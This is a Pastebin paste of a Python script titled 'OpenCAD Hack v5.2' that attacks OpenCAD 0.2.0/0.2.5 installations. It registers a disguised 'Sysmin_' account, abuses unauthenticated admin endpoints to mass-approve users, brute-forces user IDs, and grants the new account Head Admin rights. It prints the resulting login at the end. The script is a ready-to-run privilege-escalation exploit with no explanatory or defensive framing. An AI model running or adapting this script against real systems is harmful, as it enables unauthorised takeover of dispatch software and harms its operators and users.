Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- import requests
- import json
- import os
- import time
- import random
- from collections import namedtuple
- HostToHack = "url"
- MyUserId = 0
- UserRange_Start = 0
- UserRange_End = 2048
- AntiBlock = 3
- RandomName = ""
- for x in range(7):
- RandomName += str(random.randint(0, 9))
- User = 'Sysmin_'+RandomName
- Email = User+'@microsoft.com'
- Pass = RandomName
- print("OpenCAD Hack v5.2 for 0.2.0/0.2.5 (9th April 2019)\n")
- # Register a new user
- print("Register a new user ("+Email+", "+Pass+")")
- r = requests.post(HostToHack+"/actions/register.php", data={'register': 1, 'uname': User, 'email': Email, 'identifier': 'A', 'division[0]': 1, 'password': Pass, 'password1': Pass})
- if r.status_code != 200:
- print("Error: "+r.reason)
- os._exit(os.EX_NOPERM)
- # Approve all users until new one
- print("Approve all users")
- for i in range(UserRange_Start, UserRange_End):
- r = requests.post(HostToHack+"/actions/adminActions.php", data={'approveUser': 1, 'uid': i})
- if r.status_code != 200:
- print("Error: "+r.reason)
- os._exit(os.EX_NOPERM)
- r2 = requests.post(HostToHack+"/actions/login.php", data={'email': Email, 'password': Pass})
- if "Your account hasn't been approved yet." not in r2.text:
- break
- print('.', sep=' ', end='', flush=True)
- time.sleep(AntiBlock)
- # Get UserID from Email
- print("\nGet uid from "+Email)
- for i in range(UserRange_Start, UserRange_End):
- r = requests.post(HostToHack+"/actions/adminActions.php", data={'getUserDetails': 1, 'userId': i})
- if r.status_code != 200:
- print("Error: "+r.reason)
- os._exit(os.EX_NOPERM)
- print('.', sep=' ', end='', flush=True)
- usr = json.loads(r.text, object_hook=lambda d: namedtuple('usr', d.keys())(*d.values()))
- if len(usr) >= 3:
- if usr[2] == Email:
- MyUserId = int(usr[0])
- print("\nFound uid: "+usr[0])
- break
- time.sleep(AntiBlock)
- # Give Head Admin (Requires UserID)
- print("\nGive Head-Admin to "+Email)
- r = requests.post(HostToHack+"/actions/adminActions.php", data={'editUserAccount': 1, 'userName': User, 'userEmail': Email, 'userID': MyUserId, 'userIdentifier': 'A', 'userGroups[0]': 0, 'userRole': 2})
- if r.status_code != 200:
- print("Error: "+r.reason)
- os._exit(os.EX_NOPERM)
- print("Done: Email= '"+Email+"' Password= '"+Pass+"'")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement